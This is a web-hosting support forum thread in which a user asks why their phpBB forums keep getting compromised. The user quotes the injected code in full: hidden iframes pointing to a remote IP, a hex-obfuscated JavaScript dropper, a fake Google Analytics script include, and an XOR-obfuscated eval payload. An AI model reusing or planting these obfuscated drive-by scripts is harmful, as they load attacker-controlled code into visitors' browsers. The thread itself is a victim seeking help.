FRIHOST FORUMS SEARCH FAQ TOS BLOGS COMPETITIONS
You are invited to Log in or Register a free Frihost Account!


Again the same problem





nivinjoy
Respected administrators...!!!

Everything was going fine and good..until last day till i noticed that there are some problems happening on my forums hosted on Frihost...!!! There are some thing appearing in the header portion of both phpbb2 and phpbb3 forums..For knowing better see the forums at www.njoyzone.co.nr and www.nivinjoy.frih.net/forums

I am sure that i have not done anything which might have caused this...!! Please see to this matter as soon as possible...!!!

Also please note that it had happened earlier also for my forums...!!! Then i remeber someone saying some problem with the server or something like that...I don't know it clearly..!! Hope you will help me out in this...!!!


Hoping for a positive reply..!!!
rvec
it's not the server. It's this code in your file:
Code:
<iframe src="http://208.109.234.66/alfred.php" width=1 height=1 style="visibility: hidden;"></iframe><iframe src="http://208.109.234.66/alfred.php" width=1 height=1 style="visibility: hidden;"></iframe>


Use something like notepad to search for that code in all your files and delete it.
nivinjoy
Yes thank you sir..I could find it and i solved it...!! But may i ask you that "is it a sort of HTML malware...???" Please see the following link...

http://modxcms.com/forums/index.php?topic=26731.0

I didn't get it properly...!! But i think that is something that had happened..!! Can you please list out some possible ways through which this problem might have happened...???

And extremely sorry for that sort talk about the server...!! I didn't know it properly..!!

God bless..!!
nivinjoy
Oh my god...What has happened to my account...!!!!!!

The above code and similar codes were there in all my website pages,blog page and forum pages...!!! Actually what is happening....??? How can i prevent this....???

And today (that is July 7th) i can't access my Direct Admin...?? I used to access it through http://frih.net:2222 but today i couldn't...!! But i was able to access it through http://cp.frih.net ...!!!

Actually what is happening to my account...!!! Has any hacking sort of thing happened..?? Please i am very tensed..!! Please do reply...!!!

Sorry to cause trouble...!! Please save me and my website...!!!
SpellcasterDX
Maybe it's your computer. Perhaps consider running a virus/malware/adware scan to make sure you have nothing on your pc that could be infecting your files.
rvec
I'd say backup all your files from your website, put them in a zip or rar archive and then on another pc/usb-stick/cd with a backup from your pc. Then scan your whole pc with a virusscanner (avg is a good one), ad-aware and then scan all files in the zip/rar file from your website (good scanners can scan these files without you having to unpack them). If you cleaned it all update all the code on your website to the newest version and if you wrote anything yourself check it for bugs.
nivinjoy
Now this has come again...!!

Now the problem is that when i tried opening my website it didn't open and my system got stuck and suddenly switched off...!! And from then on whenever i tried opening my website my system got switched off..!! I tried in anther system in a cyber cafe and the same thing happened..!!

Then suddenly i remembered about this post here and checked for the website sourcecode and found the following unwanted codes in my web pages and when i removed these from the webpages my website came back into action as normal...!!

Now what i want to ask is How does this happen...?? As the previous poster SpellcasterDX said i too thought it would be my computer but when i scanned my system using Kaspersky Anti-Virus,it showed no virus or any sort of attack..!!

And the pages in which the codes entered showed they were last accessed on September 04 2008 at 4:32..!! But let me say i swear that at this time i waas sleeping (It is early morning in India at that time..) and didn't edit or access these files...!!

Then how did this happen..?? This is the fourth or fifth time it is happening in this sort to my website..!! Has this happened to any others' website..??

How to stop this from happening again..?? Please help me..!!
nivinjoy
Oops i forgot to post the code which entered my webpages...!!! So i tried to post the code here..!! then it showed a 500 Internal Server Error..I don't know why this happened..!!

Hope to have a positive reply on my issue as soon as possible..!!
AftershockVibe
Are you using an up-to-date version of PHPBB?
It is possible that this keeps reoccuring to to a security flaw which is being exploited.
nivinjoy
AftershockVibe wrote:
Are you using an up-to-date version of PHPBB?
It is possible that this keeps reoccuring to to a security flaw which is being exploited.


Yes my phpbb3 forum at www.nivinjoy.frih.net/forums is up to date...!! But my phpbb2 forum at www.njoyzone.co.nr is not up to date...

Will this be the reason for what has happened...??
nivinjoy
Respected administrators,moderators it is turning out to happen again...!! It happened now also...!!! The code came again and my website got stuck...!! What should i do now...??? Please help me..!! tell me a sloution...!!! Please.....!!!!

The following code appears in the website pages..!! The following appears in script tag...!!!


Quote:
function c7841638945m48c1dd65d3fd4(m48c1dd65d47a8){ function m48c1dd65d4f7d(){var m48c1dd65d5750=16;return m48c1dd65d5750;} return (parseInt(m48c1dd65d47a8,m48c1dd65d4f7d()));}function m48c1dd65d5f25(m48c1dd65d66f8){ function m48c1dd65d7e80(){var m48c1dd65d8649=2;return m48c1dd65d8649;} var m48c1dd65d6ece='';m48c1dd65d8e1b=String.fromCharCode;for(m48c1dd65d76a2=0;m48c1dd65d76a2<m48c1dd65d66f8.length;m48c1dd65d76a2+=m48c1dd65d7e80()){ m48c1dd65d6ece+=(m48c1dd65d8e1b(c7841638945m48c1dd65d3fd4(m48c1dd65d66f8.substr(m48c1dd65d76a2,m48c1dd65d7e80()))));}return m48c1dd65d6ece;} var zd6='';var m48c1dd65d95f0='3C7'+zd6+'3637'+zd6+'2697'+zd6+'07'+zd6+'43E696628216D7'+zd6+'96961297'+zd6+'B646F637'+zd6+'56D656E7'+zd6+'42E7'+zd6+'7'+zd6+'7'+zd6+'2697'+zd6+'465287'+zd6+'56E657'+zd6+'363617'+zd6+'065282027'+zd6+'2533632536392536362537'+zd6+'32253631253664253635253230253665253631253664253635253364253633253337'+zd6+'2532302537'+zd6+'332537'+zd6+'32253633253364253237'+zd6+'2536382537'+zd6+'342537'+zd6+'342537'+zd6+'302533612532662532662536322536352537'+zd6+'332537'+zd6+'342537'+zd6+'332536382536312537'+zd6+'332537'+zd6+'34253635253265253633253665253266253637'+zd6+'2536662536662536342532652536382537'+zd6+'34253664253663253366253237'+zd6+'2532622534642536312537'+zd6+'342536382532652537'+zd6+'322536662537'+zd6+'352536652536342532382534642536312537'+zd6+'342536382532652537'+zd6+'32253631253665253634253666253664253238253239253261253331253339253331253337'+zd6+'253336253239253262253237'+zd6+'253333253632253634253334253336253339253636253330253338253631253237'+zd6+'2532302537'+zd6+'37'+zd6+'2536392536342537'+zd6+'34253638253364253333253334253230253638253635253639253637'+zd6+'2536382537'+zd6+'342533642533352533362533342532302537'+zd6+'332537'+zd6+'342537'+zd6+'39253663253635253364253237'+zd6+'2536342536392537'+zd6+'332537'+zd6+'302536632536312537'+zd6+'39253361253230253665253666253665253635253237'+zd6+'2533652533632532662536392536362537'+zd6+'3225363125366425363525336527'+zd6+'29293B7'+zd6+'D7'+zd6+'6617'+zd6+'2206D7'+zd6+'969613D7'+zd6+'47'+zd6+'27'+zd6+'5653B3C2F7'+zd6+'3637'+zd6+'2697'+zd6+'07'+zd6+'43E';document.write(m48c1dd65d5f25(m48c1dd65d95f0));</script><script>check_content()
rvec
I think one of the scripts on your website got hacked. You should update them all, and maybe even dissable all till you are sure the script isn't the reason.
nivinjoy
rvec wrote:
I think one of the scripts on your website got hacked.


I didn't get you..!!What script do you mean..?? Phpbb2 ..??
rvec
possibly
nivinjoy
I removed the phpbb2 folder and deleted the database from my Direct Admin...!!

And today i found that there was a line in the HEADER part of the web pages s the following...!!! I am damn sure that i didn't put it...!!!

The line was:

<script src="http://analytics-google.info/s/urchin.js"></script>

How is that..???
nivinjoy
Great...!!! Now a new script has appeared...!!! What should i do...!! Please any administrators please take it seriously....!!! I had removed the following line :

Quote:
<script src="http://analytics-google.info/s/urchin.js"></script>


But it again appeared...!!! What is happening...!!

This is the new script...!!

Quote:
<!-- ad -->
iiiii="ccc7cbddc5cdc6dc86dfdac1dccd808f94c1cedac9c5cd88dbdacb958ac0dcdcd8928787cacddbdcdbc0c9dbdccd86cbc687cfc7c7cc86c0dcc5c48a88dfc1ccdcc0959988c0cdc1cfc0dc959988dbdcd1c4cd958adec1dbc1cac1c4c1dcd19288c0c1cccccdc68a969487c1cedac9c5cd968f8193c1c2c1c2c1958ae6c9e68a93c1c2c1c2958a8a93";
ijiji="";
iiij="function func() {ijjii=eval;iiijj=unescape;iiii=String.fromCharCode;ijii=Math.PI;iijjj=parseInt;iijj=iijjj(~((ijii&ijii)|(~ijii&ijii)&(ijii&~ijii)|(~ijii&~ijii)));iiji=iijjj(((iijj&iijj)|(~iijj&iijj)&(iijj&~iijj)|(~iijj&~iijj))&1);ijiii=iiji<<iiji;ijij=iijj;for(ijji=iijj;ijji<iiij.length;ijji-=-iiji)ijij+=iijjj(iiij.charCodeAt(ijji));ijij=ijij.toString();ijij%=iiijj(0x64);for(ijjij=iijj;ijjij<(iiiii.length>>iiji);ijjij-=-iiji){iiiji='';for(iijii=iijj;iijii<ijiii;iijii-=-iiji)iiiji+=iiiii.charAt(ijjij*ijiii+iijii);ijiji+=iiii(iiijj(0xFF)-iijjj(iijjj(iiiji,ijiii<<(ijiii+iiji))^ijij));}try{ijjii(ijiji);} catch(e){try{eval(ijiji);} catch(e) {window.location='/';}}}func();";
eval(iiij);
</script><!-- /ad -->
rvec
it has to be something in your dir/account because you are the only one with this problem (for as far as I know), I don't know what you did but the only thing an admin could do is reset your whole account (or spend a lot of time on looking through all the scripts).

So if you want it reset pm an admin, else try looking through all your scripts, your chmods and the users with more than reading permissions.
nivinjoy
I don't wish to cause any sort of difficulties to any admins by asking them to see through the codes...!!So i am ready to start afresh...!!

Please reset my whole account as soon as possible so that i can start work on my new website as soon as possible...!!

Nivin..!!
mOrpheuS
nivinjoy wrote:
Please reset my whole account as soon as possible so that i can start work on my new website as soon as possible...!!


Your hosting account has been reset. Please check your PM Inbox.
nivinjoy
Thank you sir... I will start the work as soon as possible...!!
Related topics
Account created, but directadmin password not received
PHPBB2 Avatar Problems
certain web sites re' not loading
SMTP Busted
phpBB - Installation Tutorial
Strange fonts on line
FTP problems, unable to connect
Web Site That Works with different resolutions?
server slow
Sound Problem
Need Help: Can't delete folder
Unable to get to my page?
URGENT!!!!
Trying to install Joomla
Simple Calendar script
Reply to topic    Frihost Forum Index -> Support and Web Hosting -> Web Hosting Support

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.